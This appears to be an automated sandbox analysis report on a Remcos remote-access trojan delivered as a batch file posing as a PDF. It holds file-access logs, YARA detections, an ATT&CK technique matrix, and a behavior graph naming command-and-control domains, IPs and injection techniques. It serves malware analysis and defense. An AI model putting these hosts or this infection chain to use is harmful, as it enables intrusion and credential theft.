                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008ACA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6560, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Remote Access Functionality

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-LSHWWCJump to behavior
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008ACA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6560, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                1
                Scripting
                312
                Process Injection
                11
                Masquerading
                OS Credential Dumping121
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                1
                Registry Run Keys / Startup Folder
                1
                Registry Run Keys / Startup Folder
                1
                Modify Registry
                LSASS Memory2
                Process Discovery
                Remote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                151
                Virtualization/Sandbox Evasion
                Security Account Manager151
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive1
                Remote Access Software
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture1
                Ingress Tool Transfer
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing
                Cached Domain Credentials22
                System Information Discovery
                VNCGUI Input Capture212
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1643269 Sample: Alior,pdf.bat Startdate: 19/03/2025 Architecture: WINDOWS Score: 100 44 idonetire.duckdns.org 2->44 46 udire.webpg.it 2->46 48 geoplugin.net 2->48 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 60 9 other signatures 2->60 9 powershell.exe 16 2->9         started        12 cmd.exe 1 2->12         started        14 svchost.exe 1 1 2->14         started        signatures3 58 Uses dynamic DNS services 44->58 process4 dnsIp5 68 Early bird code injection technique detected 9->68 70 Writes to foreign memory regions 9->70 72 Found suspicious powershell code related to unpacking or dynamic code loading 9->72 76 2 other signatures 9->76 17 msiexec.exe 6 17 9->17         started        22 conhost.exe 9->22         started        74 Suspicious powershell command line found 12->74 24 powershell.exe 14 20 12->24         started        26 conhost.exe 12->26         started        50 127.0.0.1 unknown unknown 14->50 signatures6 process7 dnsIp8 38 idonetire.duckdns.org 94.198.96.166, 49696, 52190 ASSEFLOWAmsterdamInternetExchangeAMS-IXIT Italy 17->38 40 geoplugin.net 178.237.33.50, 49697, 80 ATOM86-ASATOM86NL Netherlands 17->40 36 C:\ProgramData\remcos\logs.dat, data 17->36 dropped 62 Detected Remcos RAT 17->62 64 Hides threads from debuggers 17->64 28 cmd.exe 1 17->28         started        42 udire.webpg.it 148.251.230.92, 49683, 49695, 80 HETZNER-ASDE Germany 24->42 66 Found suspicious powershell code related to unpacking or dynamic code loading 24->66 30 conhost.exe 24->30         started        file9 signatures10 process11 process12 32 conhost.exe 28->32         started        34 reg.exe 1 1 28->34         started       

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.